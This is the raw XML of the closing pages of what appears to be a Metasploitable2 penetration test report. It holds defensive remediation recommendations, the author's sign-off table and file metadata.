        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable Telnet — use SSH only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">9.3 Medium — Long Term</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy a Web Application Firewall (WAF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement IDS/IPS monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Establish a regular patch management process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce a password complexity policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement network segmentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">10. Report Sign-Off</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6550"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Prepared by</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vijay S</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">June 15, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">reachvijays20@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">LinkedIn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">linkedin.com/in/vijaycybersecurity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">github.com/JacobVijay26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CONFIDENTIAL</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r>
      <w:rPr>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>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Metasploitable2 Penetration Test Report — Vijay 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920153fcef8e3a26736b9a2645178bb25b62870.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/1f7b19a879414d7da2132945f13e2fe9048dc9ec.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/9c1cf859552eda1107d8f1bbeaf99592f458d3df.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/26e88bb9d09a1e8b56b0dc8b02293c803b6c0d5b.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a14074b5e64081fed6cba250a8c68352a1799067.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/13841b2638d896e753bf2141bf059b57a863a02e.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/2ac0a4ea4a005757f10ffad4b2a7eb499e0e833a.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/3535b2687efb056c4eb5f422ce5a7bab830332ff.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/cfdecb632957c9019ec1453766cfc094b5a1a595.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8a2505f507c076995641bcc1c41b4c4220db5052.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a7a5d1f6ccc54bf8e712b199e7a2845b242a5fe7.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a8d8ec84bb64dedf6ad8feb80553339cb2659c18.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/910330ff53abf13e01ac93d83bf1b024026014f2.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a5b08b7b1ed521218c300227be7cdc72edb17044.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/7fd284fbfef283d299b10a96d5dc63554309e801.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/4e3bd2d4d544b68e3b1b218d584f913d178c887c.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/604df74dbb83c1fc5be6d405badfa7c90cf99e8b.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2026-07-23T06:55:24.544Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-23T06:55:24.544Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>